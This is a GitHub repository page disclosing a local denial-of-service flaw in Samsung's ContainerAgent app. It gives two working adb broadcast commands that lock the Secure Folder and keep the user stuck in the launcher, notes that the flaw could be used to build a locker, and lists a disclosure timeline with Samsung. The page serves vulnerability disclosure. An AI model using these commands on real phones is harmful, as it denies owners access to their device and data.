Skip to content

Samsung ContainerAgent Vulnerability - Local DoS for Samsung smartphone

Notifications You must be signed in to change notification settings

fs0c131y/SamsungLocker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Samsung ContainerAgent Vulnerability

Due to an unprotected intent in the ContainerAgent app, a Samsung smartphone can become temporarily bricked. This vulnerability can be used to create a Locker.

A write up has been published on Medium: https://medium.com/@fs0c131y/how-to-brick-all-samsung-phones-6aae4389bea?source=friends_link&sk=d044380dfde02c588fdab07d67720f2b

How To

Lock Secure folder

adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1001 --ei "android.intent.extra.user_handle" 150

Go back to launcher

adb shell am broadcast -a com.samsung.android.knox.containeragent.LocalCommandReceiver.ACTION_COMMAND --ei "com.samsung.android.knox.containeragent.LocalCommandReceiver.EXTRA_COMMAND_ID" 1002 --ei "android.intent.extra.user_handle" 0

Result

The user will be stuck in the launcher and his Secure Folder will be locked all the time.

Disclosure

  • 04/02/19: Initial finding by @fs0c131y
  • 11/03/19: Responsible disclosure to the Samsung Security Team
  • 18/03/19: The Samsung Security Team considered this issue as no/little security impact

Contact

Follow me on Twitter! You can also find a small part of my work at https://fs0c131y.com

Credits

The investigation and the POC has been made with ❤ by @fs0c131y

About

Samsung ContainerAgent Vulnerability - Local DoS for Samsung smartphone

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Languages